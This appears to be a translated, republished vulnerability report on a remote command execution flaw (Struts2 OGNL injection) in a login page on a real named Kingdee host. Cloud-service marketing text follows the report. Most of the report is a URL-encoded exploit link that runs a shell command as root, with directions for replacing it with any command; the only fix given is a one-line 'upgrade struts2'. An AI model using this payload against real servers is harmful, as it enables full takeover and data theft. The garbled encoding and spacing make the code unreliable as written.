The logon region (root permission) of Kingdee website users is likely to obtain webshell (of course I did not try to obtain it), which may threaten user data security. Attackers can execute arbitrary commands with root privileges to gain full control over the server and use this server as a stepping stone to threaten the security of other servers around them.
Access the following link in IE: http://id.kingdee.com/oauth/authorize.action? Using c (% 27id % 27 ). getInputStream () % 2c % 23b % 3 dnew + java. io. inputStreamReader (% 23a) % 2c % 23c % 3 dnew + java. io. bufferedReader (% 23b) % 2c % 23d % 3 dnew + char % 5b50000% 5d % 2c % 23c. read (% 23d) % 2c % 23 S3cur1ty % 3d % 40org. apache. struts2.ServletActionContext % 40 getResponse (). getWriter () % 2c % 23s3cur1ty. println (% 23d) % 2c % 23s3cur1ty. close () (aa) & x [(class. classLoader. jarPath) ('A')] You can see that the command "id", 1 is executed. (During the test, I open the above link in the IE browser and directly display the command execution result. When I open the above link in Mozilla Firefox and Google Chrome, a message will be prompted to download the file, the command execution result is in the downloaded file .) Replace the "id" in exec (% 27id % 27) in the Code with the command you want to execute any command with the root permission.
Solution:
Upgrade the struts2 vulnerability.
Start building with 50+ products and up to 12 months usage for Elastic Compute Service
1 on 1 presale consultation
24/7 Technical Support 6 Free Tickets per Quarter Faster Response
Alibaba Cloud offers highly flexible support services tailored to meet your exact needs.
A comprehensive suite of global cloud computing services to power your business
Payment Methods We Support
